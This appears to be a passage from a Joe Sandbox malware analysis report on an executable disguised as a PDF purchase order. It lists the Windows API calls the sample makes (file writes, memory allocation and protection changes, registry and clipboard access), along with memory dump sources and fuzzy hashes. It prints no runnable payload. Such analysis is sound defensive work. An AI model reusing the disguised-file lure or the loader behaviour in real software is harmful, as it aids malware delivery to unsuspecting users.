                                                                                                            • Instruction Fuzzy Hash: 76E08C326005009BCB10AFB5AA4999D3375DF90369710007BE402F10E1CABC9C409A2D
                                                                                                            APIs
                                                                                                            • GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$AttributesCreate
                                                                                                            • String ID:
                                                                                                            • API String ID: 415043291-0
                                                                                                            • Opcode ID: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
                                                                                                            • Instruction ID: a29eaa7254a97888a18cbfd792fe15e84c6d283973f4e4682f27fdddc38ff468
                                                                                                            • Opcode Fuzzy Hash: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
                                                                                                            • Instruction Fuzzy Hash: 71D09E71654601AFEF098F20DE16F2E7AA2FB84B00F11562CB682940E0DAB158199B15
                                                                                                            APIs
                                                                                                            • CreateDirectoryW.KERNELBASE(?,00000000,00403293,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405706
                                                                                                            • GetLastError.KERNEL32 ref: 00405714
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 1375471231-0
                                                                                                            • Opcode ID: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
                                                                                                            • Instruction ID: 3f205c5890689a668e8791f8cf6ed098ce3dcc56284ebb1818e0a19aeae2b5ff
                                                                                                            • Opcode Fuzzy Hash: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
                                                                                                            • Instruction Fuzzy Hash: DBC04C30225602DADA106F34DE087177951AB90741F1184396146E61A0DA348415E93D
                                                                                                            APIs
                                                                                                            • VirtualAlloc.KERNELBASE(00000000), ref: 10002963
                                                                                                            • GetLastError.KERNEL32 ref: 10002A6A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2020005310.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2019990214.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2020057688.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2020073545.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_10000000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocErrorLastVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 497505419-0
                                                                                                            • Opcode ID: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                                                                            • Instruction ID: 77f315af6c145f6c632c2ebe68d3f6cdb0cf0445c85f86b19d364da59c27affc
                                                                                                            • Opcode Fuzzy Hash: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                                                                            • Instruction Fuzzy Hash: 8851C4B9905214DFFB20DFA4DD8675937A8EB443D0F22C42AEA04E721DCE34E990CB55
                                                                                                            APIs
                                                                                                            • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 004027A0
                                                                                                              • Part of subcall function 00405F9C: wsprintfW.USER32 ref: 00405FA9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FilePointerwsprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 327478801-0
                                                                                                            • Opcode ID: 625ba8c0adf551b09f916d27f71fdaae1f0ecd84ce04db3249cbe24fae782c82
                                                                                                            • Instruction ID: c5c3fa32fc6d0159c61c67e46e8878479b4609e7a69e49ca0ebb3ecbbe822ed2
                                                                                                            • Opcode Fuzzy Hash: 625ba8c0adf551b09f916d27f71fdaae1f0ecd84ce04db3249cbe24fae782c82
                                                                                                            • Instruction Fuzzy Hash: A0E04F71702514EFDB01AFA59E4ACAFBB6AEB40328B14443BF501F00E1DA7D8C019A2D
                                                                                                            APIs
                                                                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004022D4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: PrivateProfileStringWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 390214022-0
                                                                                                            • Opcode ID: 60b22f5a932472850941fcf3cf4ac9c96d80a2104eac916f2d4d26c3cfc5b4d4
                                                                                                            • Instruction ID: 9c0f32427e9d9ad9a827debec1b0d32512713181f08a0e22f3c826aa7fb996c6
                                                                                                            • Opcode Fuzzy Hash: 60b22f5a932472850941fcf3cf4ac9c96d80a2104eac916f2d4d26c3cfc5b4d4
                                                                                                            • Instruction Fuzzy Hash: 90E04F319001246ADB113EF10E8ED7F31695B40314B1405BFB551B66C6D9FC0D4246A9
                                                                                                            APIs
                                                                                                            • RegOpenKeyExW.KERNELBASE(00000000,00000477,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Open
                                                                                                            • String ID:
                                                                                                            • API String ID: 71445658-0
                                                                                                            • Opcode ID: e61a0d233959cf951fd8dee32620159f1f5f2b0e63671ee31e14641033e06cac
                                                                                                            • Instruction ID: 180cb462b76767e938a43b2c67eaf1f9418a6812eb156052446fd1a81c43fca4
                                                                                                            • Opcode Fuzzy Hash: e61a0d233959cf951fd8dee32620159f1f5f2b0e63671ee31e14641033e06cac
                                                                                                            • Instruction Fuzzy Hash: 54E0BF76154108AFDB00DFA5EE46EA977ECAB44704F044025BA09E7191C674E5509768
                                                                                                            APIs
                                                                                                            • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040320B,00000000,00416A20,000000FF,00416A20,000000FF,000000FF,00000004,00000000), ref: 00405CF0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 3934441357-0
                                                                                                            • Opcode ID: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                                                                            • Instruction ID: d2761c75b63c3b5a1b4cb2cfb4b6a55fbed1fd27b7f8bdfe76624f6b99830631
                                                                                                            • Opcode Fuzzy Hash: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                                                                            • Instruction Fuzzy Hash: 2AE0EC3221425AABDF109E55EC08FEB7B6CEF05360F049437FA55E7190D631E921DBA4
                                                                                                            APIs
                                                                                                            • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403255,00000000,00000000,00403079,000000FF,00000004,00000000,00000000,00000000), ref: 00405CC1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 2738559852-0
                                                                                                            • Opcode ID: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
                                                                                                            • Instruction ID: 881bd9ca443264ea0180802fa9c86a3c9bfb0e6b132b989af4612487e9445b73
                                                                                                            • Opcode Fuzzy Hash: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
                                                                                                            • Instruction Fuzzy Hash: D1E08632104259ABDF105E518C00AEB376CFB04361F104432F911E3140D630E8119FB4
                                                                                                            APIs
                                                                                                            • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2020005310.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2019990214.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2020057688.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2020073545.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_10000000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ProtectVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 544645111-0
                                                                                                            • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                            • Instruction ID: 0f6967942ea94a3d6c88e3f350f968197b77ea31d8e69eb9713f4ef8856af232
                                                                                                            • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                            • Instruction Fuzzy Hash: 47F0A5F15057A0DEF350DF688C847063BE4E3483C4B03852AE3A8F6269EB344454CF19
                                                                                                            APIs
                                                                                                            • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AttributesFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 3188754299-0
                                                                                                            • Opcode ID: 9f81f92dad3f7a811467f01a8cf18fc77b7af2f5e37f886534bc513ef1489464
                                                                                                            • Instruction ID: 4fb9e9dd77d4d4fa14caa6284e3e33111a790732df8c0ecbc47c365062d5febc
                                                                                                            • Opcode Fuzzy Hash: 9f81f92dad3f7a811467f01a8cf18fc77b7af2f5e37f886534bc513ef1489464
                                                                                                            • Instruction Fuzzy Hash: 4BD05E33B04100DBCB10DFE8AE08ADD77B5AB80338B248177E601F21E4D6B8C650AB1D
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(00000028,?,00000001,00403F7A), ref: 0040415C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 3850602802-0
                                                                                                            • Opcode ID: 3e4e113e80d15ce5a74be4961f661226ffae6a612218aa542e548efe3475e5a4
                                                                                                            • Instruction ID: f9280d834dafdcf82d79e279d22eccff0cbc279b2038abc2a2984d0c0ecbec1f
                                                                                                            • Opcode Fuzzy Hash: 3e4e113e80d15ce5a74be4961f661226ffae6a612218aa542e548efe3475e5a4
                                                                                                            • Instruction Fuzzy Hash: E3B01235180A00BBDE114B00EE09F857E62F7EC701F018438B340240F0CBB200A0DB08
                                                                                                            APIs
                                                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FB5,?,?,?,00000000,0040353A,?), ref: 00403266
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FilePointer
                                                                                                            • String ID:
                                                                                                            • API String ID: 973152223-0
                                                                                                            • Opcode ID: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
                                                                                                            • Instruction ID: 2811e774c662cae59278f25d6ecae3b2a92cb5be3fe339fd2c15133e28e6e099
                                                                                                            • Opcode Fuzzy Hash: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
                                                                                                            • Instruction Fuzzy Hash: D0B01231140300BFDA214F00DF09F057B21AB90700F10C034B344380F086711035EB4D
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,00000403), ref: 00405351
                                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 00405360
                                                                                                            • GetClientRect.USER32(?,?), ref: 0040539D
                                                                                                            • GetSystemMetrics.USER32(00000002), ref: 004053A4
                                                                                                            • SendMessageW.USER32(?,00001061,00000000,?), ref: 004053C5
                                                                                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053D6
                                                                                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053E9
                                                                                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053F7
                                                                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040540A
                                                                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040542C
                                                                                                            • ShowWindow.USER32(?,00000008), ref: 00405440
                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 00405461
                                                                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405471
                                                                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040548A
                                                                                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405496
                                                                                                            • GetDlgItem.USER32(?,000003F8), ref: 0040536F
                                                                                                              • Part of subcall function 0040414E: SendMessageW.USER32(00000028,?,00000001,00403F7A), ref: 0040415C
                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004054B3
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00005287,00000000), ref: 004054C1
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 004054C8
                                                                                                            • ShowWindow.USER32(00000000), ref: 004054EC
                                                                                                            • ShowWindow.USER32(?,00000008), ref: 004054F1
                                                                                                            • ShowWindow.USER32(00000008), ref: 0040553B
                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040556F
                                                                                                            • CreatePopupMenu.USER32 ref: 00405580
                                                                                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405594
                                                                                                            • GetWindowRect.USER32(?,?), ref: 004055B4
                                                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055CD
                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405605
                                                                                                            • OpenClipboard.USER32(00000000), ref: 00405615
                                                                                                            • EmptyClipboard.USER32 ref: 0040561B
                                                                                                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405627
                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00405631
                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405645
                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405665
                                                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00405670
                                                                                                            • CloseClipboard.USER32 ref: 00405676
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                            • String ID: {
                                                                                                            • API String ID: 590372296-366298937
                                                                                                            • Opcode ID: 6a0fc3a2d5fa7d70d7ffe9782798eb57218c845f869a5f65bcd99de69d398bf2
                                                                                                            • Instruction ID: bedd14c977596f777f0676ed5d78e17ab23f6a1f4e688fc8743dda88f8352f2f
                                                                                                            • Opcode Fuzzy Hash: 6a0fc3a2d5fa7d70d7ffe9782798eb57218c845f869a5f65bcd99de69d398bf2
                                                                                                            • Instruction Fuzzy Hash: 85B15A71900608FFDB11AF60DD89AAE7B79FB48355F00803AFA41BA1A0CB755E51DF58
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,000003FB), ref: 00404603
                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 0040462D
                                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 004046DE
                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 004046E9
                                                                                                            • lstrcmpiW.KERNEL32(Call,0042D268,00000000,?,?), ref: 0040471B
                                                                                                            • lstrcatW.KERNEL32(?,Call), ref: 00404727
                                                                                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404739
                                                                                                              • Part of subcall function 0040577E: GetDlgItemTextW.USER32(?,?,00000400,00404770), ref: 00405791
